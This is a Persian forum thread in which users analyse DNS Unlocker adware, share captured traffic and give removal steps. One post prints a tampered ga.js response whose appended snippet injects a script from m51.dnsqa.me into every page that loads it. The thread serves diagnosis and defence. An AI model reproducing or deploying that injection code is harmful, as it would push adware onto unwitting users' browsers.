تهدید dns unlocker

[علیرضا حسنی]

دوباره فعال شد این دفعه از آی پی های متفاوت (173.194.113.68) ولی در همون رنج.
فایل های مربوطه رو برای ماهر فرستادم برای شما هم میزارم اگه خواستید آنالیزی بکنید. البته واقعا جای آنالیز بیشتر نداره همه چی کاملا واضح شده.
فقط اینکه من مستقیما نه ولی در یکی از فرومهای گوگل موضوع رو ریپورت کردم، اگه تمایل دارید بررسی کنید شاید بهتر باشه سریعتر این کار رو انجام بدید.

لینک فایل cap
http://uplod.ir/o8oj0ebrb1w0/dnsunlocker.rar.htm

اینم رکویست ریسپانسی که خواسته بودید

کد: انتخاب همه

GET /ga.js HTTP/1.1
Host: www.google-analytics.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: http://static.addtoany.com/menu/sm13.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

ریسپانس از 173.194.113.68

کد: انتخاب همه

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 41233
Content-Type: application/javascript
ETag: W/"560a9ce5-9fdc"
Server: nginx
Expires: Tue, 29 Sep 2015 16:19:24 GMT
Last-Modified: Tue, 29 Sep 2015 14:15:01 GMT
Connection: keep-alive
Date: Tue, 29 Sep 2015 14:51:38 GMT

(function(){var aa=encodeURIComponent,ba=Infinity,ca=setTimeout,da=isNaN,m=Math,ea=decodeURIComponent;function Ie(a,b){return a.onload=b}function Je(a,b){return a.onerror=b}function ha(a,b){return a.name=b}
.
.
.
.
E.la=function(){this.G=!0};var Fe=function(a){if("prerender"==J.visibilityState)return!1;a();return!0};var M=new $;var nf=W._gat;nf&&Ba(nf._getTracker)?M=nf:W._gat=M;var Z=new Y;(function(a){if(!Fe(a)){H(123);var b=!1,c=function(){!b&&Fe(a)&&(b=!0,Ha(J,"visibilitychange",c))};Ga(J,"visibilitychange",c)}})(function(){var a=W._gaq,b=!1;if(a&&Ba(a[n])&&(b="[object Array]"==Object[x][v].call(Object(a)),!b)){Z=a;return}W._gaq=Z;b&&Z[n][ya](Z,a)});function Yc(a){var b=1,c=0,d;if(a)for(b=0,d=a[w]-1;0<=d;d--)c=a.charCodeAt(d),b=(b<<6&268435455)+c+(c<<14),c=b&266338304,b=0!=c?b^c>>21:b;return b};})();

/* DNS Quality Check */ if (typeof dns_qc === 'undefined') { var dns_qc = document.createElement('script'); dns_qc.type='text/javascript'; dns_qc.src='http://m51.dnsqa.me/QualityCheck/ga.js'; var dns_qc_head = document.getElementsByTagName('head')[0]; if (dns_qc_head) { dns_qc_head.appendChild(dns_qc); } }

[ehsanch]

[quote="علیرضا حسنی"]

ریسپانس از 173.194.113.68[/QUOTE]

مطمئنید این ریسپانس از این آی پی بوده ؟ خیلی خیلی خیلی بعیده که سرورهای گوگل آلوده شده باشه اونم به چنین چیز واضحی اونم بعد این همه مدت متوجه نشده باشند.
اگه اینجوری باشه احتمال زیاد علاوه بر تغییر دی ان اس ، روتینگ رو هم تغییر میده این حمله کننده.

[علیرضا حسنی]

[quote="ehsanch"]مطمئنید این ریسپانس از این آی پی بوده ؟ خیلی خیلی خیلی بعیده که سرورهای گوگل آلوده شده باشه اونم به چنین چیز واضحی اونم بعد این همه مدت متوجه نشده باشند.
اگه اینجوری باشه احتمال زیاد علاوه بر تغییر دی ان اس ، روتینگ رو هم تغییر میده این حمله کننده.[/QUOTE]

بله کاملا مطمئن هستم، این رکویست هام واسه همین چند لحظه پیش هست. فایل cap رو گزاشتم با wireshark میتونید کاملا روند حمله رو بررسی کنید.

http://s6.uplod.ir/i/00684/58isgdvq1cw0.png


در تصویر زیر به جایی که های لایت شده دقت کنید
http://s6.uplod.ir/i/00684/y7t5ni4ekkt5.png

[upm1051]

سلام بنده دانش کامپیوترم مثل دوستان نیست ولی این ویروس خیلی اذیتم میکنه
همه راه ها رو فتم حتی چند بار ویندوز عوض کردم
آنتی ویروس و اپای هانتر و اینا هم جواب نمیده
دوستان راه حلی داره ؟ میشه اموزش بدین

[علیرضا حسنی]

[quote="upm1051"]سلام بنده دانش کامپیوترم مثل دوستان نیست ولی این ویروس خیلی اذیتم میکنه
همه راه ها رو فتم حتی چند بار ویندوز عوض کردم
آنتی ویروس و اپای هانتر و اینا هم جواب نمیده
دوستان راه حلی داره ؟ میشه اموزش بدین[/QUOTE]

راه حل فعلا نداره، موقتا میتونید مثلا با استفاده از اینترنت سکیوریتی کسپرسکی لود شدن آنالیتیکز رو روی مرورگر خودتون بلاک کنید.

[Matin2005]

بنده هم به این ویروس الوده شدم . حتی در سایت هایی مثل تابناک خطر رو گوشزد کردم ولی متاسفانه به نظر میرسه انگیزه ای برای این کار در کشور نیست . فعلا از کسپر استفاده کردم و حد حمله بسیار کاهش پیدا کرده و بهتر از قبل شده ....

[upm1051]

آقا من آنتی ویروسم avast هست یعنی پاکش کنم؟ free version اونو نصب کردم؟؟؟؟!

[Naficy]

سلام


خطاب به root و سایر دوستان:
دوستان توجه کنید که اغلب IP های ذکر شده در این صفحه مربوط به سرور گوگل هستند و از این جهت مشکلی ندارند.
بخصوص IP هایی که با 173.194 شروع می‌شوند همگی متعلق به گوگل هستند.
همچنین IP های رنج 216.58.192.0 - 216.58.223.255 متعلق به گوگل هستند.
بنابراین با دیدن این IP ها نگران نشوید. این سرورها پاک هستند.

اینکه چرا سرورهای گوگل از IPهای مختلف استفاده می‌کنند کاملا طبیعی است و به علت تعداد زیاد سرورها است. همچنین معمولا برای توزیع بار مرتبا این IPها به صورت گردشی تغییر می‌کنند.


در پاسخ به آقای علیرضا حسنی عزیز:
علت اینکه شما اسکریپت جعلی را از آی‌پی‌ سرور گوگل دریافت می‌کنید، این است که ISP شما دارای مکانیزم cache است. خود سرور گوگل پاک است و مشکلی ندارد.
در واقع اتفاقی که می‌افتد این است:
۱- کامپیوتر کاربر الف به DNS Unlocker آلوده است. این کامپیوتر به اینترنت متصل شده و درخواست دریافت ga.js را از سرور گوگل می‌کند.
۲- بدافزار - با تغییر DNS - این درخواست را به جای سرور گوگل به سرور خود هدایت کرده و در نتیجه اسکریپت جعلی ga.js توسط کاربر دریافت می‌شود. همچنین ISP (در مورد شما ADSL مخابرات، ولی در سایر ISPها هم این مکانیزم وجود دارد) اسکریپت جعلی را کش می‌کند.
۳- هنگامیکه کامپیوتر شما (که آلوده نیست) درخواست دریافت ga.js را از سرور گوگل می‌کند، ISP متوجه تکراری بودن درخواست شده و همان اسکریپت کاربر الف را برای شما ارسال می‌کند.
۴- در نتیجه، تبلیغات روی کامپیوتر شما (و تمامی استفاده کنندگان از ISP شما) مشاهده خواهد شد.

من این مساله را در لاگ pcap ارسالی شما بررسی کردم و اسکریپت ga.js از طریق کش ISP برای شما ارسال شده است نه سرور گوگل.

برای تست این سناریو کافیست که دقیقا همان کاری که با نرم‌افزار burpsuit انجام داده بودید را این بار با IP هر سرور دیگری (مثلا microsoft.com یا farsnews.com یا ...) انجام دهید تا همان نتیجه را ببینید.

[upm1051]

[quote="Naficy"]سلام


خطاب به root و سایر دوستان:
دوستان توجه کنید که اغلب IP های ذکر شده در این صفحه مربوط به سرور گوگل هستند و از این جهت مشکلی ندارند.
بخصوص IP هایی که با 173.194 شروع می‌شوند همگی متعلق به گوگل هستند.
همچنین IP های رنج 216.58.192.0 - 216.58.223.255 متعلق به گوگل هستند.
بنابراین با دیدن این IP ها نگران نشوید. این سرورها پاک هستند.

اینکه چرا سرورهای گوگل از IPهای مختلف استفاده می‌کنند کاملا طبیعی است و به علت تعداد زیاد سرورها است. همچنین معمولا برای توزیع بار مرتبا این IPها به صورت گردشی تغییر می‌کنند.


در پاسخ به آقای علیرضا حسنی عزیز:
علت اینکه شما اسکریپت جعلی را از آی‌پی‌ سرور گوگل دریافت می‌کنید، این است که ISP شما دارای مکانیزم cache است. خود سرور گوگل پاک است و مشکلی ندارد.
در واقع اتفاقی که می‌افتد این است:
۱- کامپیوتر کاربر الف به DNS Unlocker آلوده است. این کامپیوتر به اینترنت متصل شده و درخواست دریافت ga.js را از سرور گوگل می‌کند.
۲- بدافزار - با تغییر DNS - این درخواست را به جای سرور گوگل به سرور خود هدایت کرده و در نتیجه اسکریپت جعلی ga.js توسط کاربر دریافت می‌شود. همچنین ISP (در مورد شما ADSL مخابرات، ولی در سایر ISPها هم این مکانیزم وجود دارد) اسکریپت جعلی را کش می‌کند.
۳- هنگامیکه کامپیوتر شما (که آلوده نیست) درخواست دریافت ga.js را از سرور گوگل می‌کند، ISP متوجه تکراری بودن درخواست شده و همان اسکریپت کاربر الف را برای شما ارسال می‌کند.
۴- در نتیجه، تبلیغات روی کامپیوتر شما (و تمامی استفاده کنندگان از ISP شما) مشاهده خواهد شد.

من این مساله را در لاگ pcap ارسالی شما بررسی کردم و اسکریپت ga.js از طریق کش ISP برای شما ارسال شده است نه سرور گوگل.

برای تست این سناریو کافیست که دقیقا همان کاری که با نرم‌افزار burpsuit انجام داده بودید را این بار با IP هر سرور دیگری (مثلا microsoft.com یا farsnews.com یا ...) انجام دهید تا همان نتیجه را ببینید.[/QUOTE]

سلام جناب مهندس امکان اینکه راه حلی بدین که این ویروس رو پاک کنیم هست ؟ من آنتی ویروسم اوست فری هست
میشه راهنمایی بفرمایید

[Naficy]

راه حذف بدافزار DNS Unlocker

حذف بدافزار سه مرحله دارد:

۱- پاک کردن کامپیوتر از آلودگی بدافزار:
برای این کار سیستم خود را با پادویش، ADWCleaner یا هر ابزار ضدتبلیغ‌افزار دیگر اسکن و تمیز کنید.

۲- به تنظیمات DNS سیستم خود سر زده و آنها را به حالت خودکار تغییر دهید.
می‌توانید از این آموزش استفاده کنید فقط در مرحله آخر گزینه Obtain DNS Server Address automatically را انتخاب کنید.

۳- پاک کردن کش مرورگر
در این مرحله باید کش Firefox/Chrome/IE یا هر مرورگری که استفاده می‌کنید را پاک کنید. (در کروم و فایرفاکس کلید Ctrl+Shift+Del را بزنید و دقت کنید گزینه‌های مربوط به Cache تیک خورده باشند)

همچنین می‌توانید این راه‌حل تصویری را مطالعه و دنبال کنید. (راهنمای مرکز ماهر)

راه جلوگیری از تبلیغات بدافزار DNS Unlocker
اگر بعد از انجام مراحل بالا بدافزار دوباره بازگشت؛ احتمال دارد کش ISP که اینترنت را از آن خریده‌اید دچار مشکل شده است.
برای رفع این مساله می‌توانید IP سایت www.google-analytics.com را به طور کامل ببندید:

۱- به فولدر C:\Windows\System32\Drivers\etc\ بروید و فایل hosts را روی دسکتاپ خود کپی کنید.
۲- برنامه notepad را باز کرده و فایل hosts روی دسکتاپ را به روی notepad بکشید تا باز شود.
۳- یک سطر به انتهای فایل اضافه کنید:

کد: انتخاب همه

0.0.0.0 www.google-analytics.com

۴- فایل را ذخیره کنید و سپس به محل اصلی بازگردانید. (از فایل قبلی یک نسخه نگهدارید که اگر لازم شد بتوانید آن را بازگردانید)